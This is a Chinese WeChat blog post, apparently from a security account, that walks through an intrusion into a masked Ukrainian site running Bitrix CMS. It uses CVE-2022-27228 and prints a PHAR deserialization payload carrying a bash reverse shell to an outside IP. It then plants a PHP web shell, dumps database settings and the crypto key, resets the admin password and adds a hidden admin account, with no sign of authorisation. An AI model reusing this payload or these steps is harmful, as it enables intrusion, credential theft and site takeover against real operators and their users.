点击上方蓝字关注我们 并设为星标
0x00 前言
今天的主角:https://*****.*****.ua/
0x01 外网打点
先查询一下服务器开放的端口 我都去试过了 没有任何可利用的信息
通过浏览器插件找到某处js里似乎是有该网站的特征信息 bitrix
去google上查询了发现是Ru的一套cms系统 bitrix24 去查阅相关漏洞 发现了CVE-2022-27228.
这个漏洞cvss评分挺高 应该是高危洞 直接找poc测一下 发现确实存在漏洞.(找了很久 才从github上找到 不过现在仓库已经无了)
直接通过利用脚本反弹Shell后写PHPshell 然后连接.
<?php __HALT_COMPILER(); ?>
f 0 O:25:"BitrixMainEntityResult":2:{s:12:" * isSuccess";b:0;s:9:" * errors";O:36:"BitrixMainUserConsentDataProvider":1:{s:7:" * data";a:2:{i:0;O:26:"CAdminDraggableBlockEngine":2:{s:10:" * engines";a:1:{i:0;a:1:{s:5:"check";s:6:"system";}}s:7:" * args";s:20:"bash -i >& /dev/tcp/8.***.**.**/6666 0>&1";}i:1;s:5:"check";}}} test.txt 炦c 千?? text緲?坈+rO 6?]]?'? GBMB
https://*****.*****/***.php
查看了下它的IP 192.168.105.55 确实是在内网之中,那就有了进一步操作渗透内网的可能
数据库文件是存在 /bitrix/.settings.php 中, so 我们直接去查找.
return array (
'utf_mode' =>
array (
'value' => false,
'readonly' => true,
),
'cache_flags' =>
array (
'value' =>
array (
'config_options' => 3600.0,
'site_domain' => 3600.0,
),
'readonly' => false,
),
'cookies' =>
array (
'value' =>
array (
'secure' => false,
'http_only' => true,
),
'readonly' => false,
),
'exception_handling' =>
array (
'value' =>
array (
'debug' => true,
'handled_errors_types' => 4437,
'exception_errors_types' => 4437,
'ignore_silence' => false,
'assertion_throws_exception' => true,
'assertion_error_type' => 256,
'log' => NULL,
),
'readonly' => false,
),
'connections' =>
array (
'value' =>
array (
'default' =>
array (
'className' => '\Bitrix\Main\DB\MysqliConnection',
'host' => 'localhost',
'database' => 'c8aritmolog',
'login' => '****************',
'password' => '*****************',
'options' => 2.0,
),
),
'readonly' => true,
),
'crypto' =>
array (
'value' =>
array (
'crypto_key' => '61ffea2a5e26b50************',
),
'readonly' => true,
),
);
OK. 让我们连接上数据库:
查看用户表 B_User 发现有非常多的用户
admin的密码Cmd5解不开 于是直接利用官方程序重置Admin的Password.
发现页面回显 1 说明成功重置了Admin的密码为 B*******456
访问 https://*****.*****/bitrix/admin/#authorize 输入重置后的账密 成功进入后台.
访问 https://*****.******/bitrix/admin/user_admin.php?lang=en 进入用户管理 发现还有人往里边Sql注入......
创建管理用户 Bi*******8rt|******* 并将admin的密码改回
至此 完全控制该站点 可修改网站任意参数,可进行部署恶意链接 钓鱼等操作.
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE
关注下方公众号,发送 240908获取漏洞脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):记一次渗透测试某靶标 (1)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论